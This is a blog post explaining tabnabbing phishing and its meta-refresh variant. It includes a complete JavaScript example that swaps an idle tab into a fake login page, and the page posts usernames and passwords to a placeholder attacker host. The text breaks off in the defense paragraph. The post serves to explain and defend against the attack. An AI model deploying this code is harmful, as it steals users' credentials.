Tuesday 5 August 2014

What is Tabnabbing?

Tabnabbing is a phishing attack that persuades users to submit their usernames and passwords for popular websites by impersonating those sites in a tab the user already has open, so that the page appears genuine. The name was coined in early 2010 by Aza Raskin, a security researcher and interface designer.
The attack exploits users' trust in their open tabs, their inattention to the details of a tab's title and icon, and the ability of a modern web page to rewrite its own title, favicon and contents long after it has finished loading. Tabnabbing works in the reverse direction of most phishing: the user is never asked to click an obfuscated link. Instead, a page already open in one of the browser's tabs turns into the fake login page.
The page that carries the attack looks like an ordinary site of average interest. A script watches for the tab to lose focus and, after it has been left unattended for some time, rewrites the page into an impersonation of a well-known website. A user who returns after a while, sees a familiar login page and assumes they were logged out is induced to enter their login, password and other details, which are sent to the attacker. The attack succeeds more often if the script first checks which well-known sites the user has visited in the past or has open in other tabs, and impersonates one of those. A scriptless variant works even with JavaScript disabled: the <meta http-equiv="refresh"> element, normally used for page redirection, makes the browser load a specified new page after a fixed time interval. The scriptless form cannot tell whether the tab is actually inactive, so it can only gamble on a delay long enough that the user has probably moved on.
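Both mechanisms described above, as an added example that is not part of the original post and is not Raskin's demonstration code. The site names, URLs, delays, the hasVisited hook and the SAMPLE_TARGETS list are placeholders invented for the example; the decision logic is kept separate from the browser wiring so it can be exercised outside a browser.

```javascript
// Added example, not code from the original post: the two mechanisms a
// tabnabbing page relies on, written so the decision logic can run outside a
// browser.  All URLs, site names and delays are placeholders.

// Scriptless variant.  The page ships this tag and the browser itself loads the
// impostor URL after the delay, no JavaScript required.
function buildMetaRefresh(delaySeconds, targetUrl) {
  if (!Number.isInteger(delaySeconds) || delaySeconds < 0) {
    throw new RangeError('delay must be a non-negative whole number of seconds');
  }
  return `<meta http-equiv="refresh" content="${delaySeconds};url=${targetUrl}">`;
}

// Scripted variant, step 1: measure how long the tab has been out of view.
// The swap only fires once the tab has stayed hidden for the full threshold;
// if the user comes back early nothing happens and the countdown resets.
class InactivityTracker {
  constructor(thresholdMs) {
    this.thresholdMs = thresholdMs;
    this.hiddenSince = null;
  }
  onHidden(nowMs) {            // tab lost focus or became hidden
    if (this.hiddenSince === null) this.hiddenSince = nowMs;
  }
  onVisible() {                // user returned before the swap: abort
    this.hiddenSince = null;
  }
  isDue(nowMs) {
    return this.hiddenSince !== null && nowMs - this.hiddenSince >= this.thresholdMs;
  }
}

// Step 2: choose which site to impersonate.  `hasVisited` is a hypothetical
// hook standing in for whatever signal the attacker has about the victim's
// browsing; the first candidate it reports as visited wins.
function pickTarget(candidates, hasVisited) {
  for (const c of candidates) {
    if (hasVisited(c.name)) return c;
  }
  return null;
}

// Step 3: produce the pieces that get swapped in.  Title and favicon matter as
// much as the body, because they are all the user sees in the tab strip.
function renderImpostor(target) {
  return {
    title: target.title,
    favicon: target.faviconUrl,
    body: `<form method="post" action="${target.harvestUrl}">` +
          `<h1>Sign in to ${target.name}</h1>` +
          `<input name="user"><input name="pass" type="password">` +
          `<button>Sign in</button></form>`,
  };
}

// Constructed sample data for the example (not real sites).
const SAMPLE_TARGETS = [
  { name: 'ExampleMail', title: 'ExampleMail - Sign in',
    faviconUrl: 'https://attacker.invalid/fav/mail.ico',
    harvestUrl: 'https://attacker.invalid/collect' },
  { name: 'ExampleBank', title: 'ExampleBank Online Banking',
    faviconUrl: 'https://attacker.invalid/fav/bank.ico',
    harvestUrl: 'https://attacker.invalid/collect' },
];

// Browser wiring (only runs where `document` exists).  Hooks the visibility
// events, polls the tracker, and rewrites the page in place once the delay
// has elapsed with the tab hidden.
if (typeof document !== 'undefined') {
  const tracker = new InactivityTracker(5 * 60 * 1000);   // five minutes hidden
  document.addEventListener('visibilitychange', () => {
    if (document.hidden) tracker.onHidden(Date.now());
    else tracker.onVisible();
  });
  const poll = setInterval(() => {
    if (!tracker.isDue(Date.now())) return;
    clearInterval(poll);
    // Placeholder predicate: treats every candidate as previously visited.
    const target = pickTarget(SAMPLE_TARGETS, () => true);
    const page = renderImpostor(target);
    document.title = page.title;
    let icon = document.querySelector('link[rel~="icon"]');
    if (!icon) {
      icon = document.createElement('link');
      icon.rel = 'icon';
      document.head.appendChild(icon);
    }
    icon.href = page.favicon;
    document.body.innerHTML = page.body;
  }, 1000);
}
```

The tracker is the part worth understanding from the defender's side: nothing is fetched and no navigation happens, so URL filters and link scanners see only the innocuous page that was originally loaded. The address bar still shows the original page's URL after the swap, which is the one signal the attack cannot forge.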
The NoScript extension for Mozilla Firefox defends against both the JavaScript-based attack and the scriptless, meta-refresh-based one by preventing inactive tabs
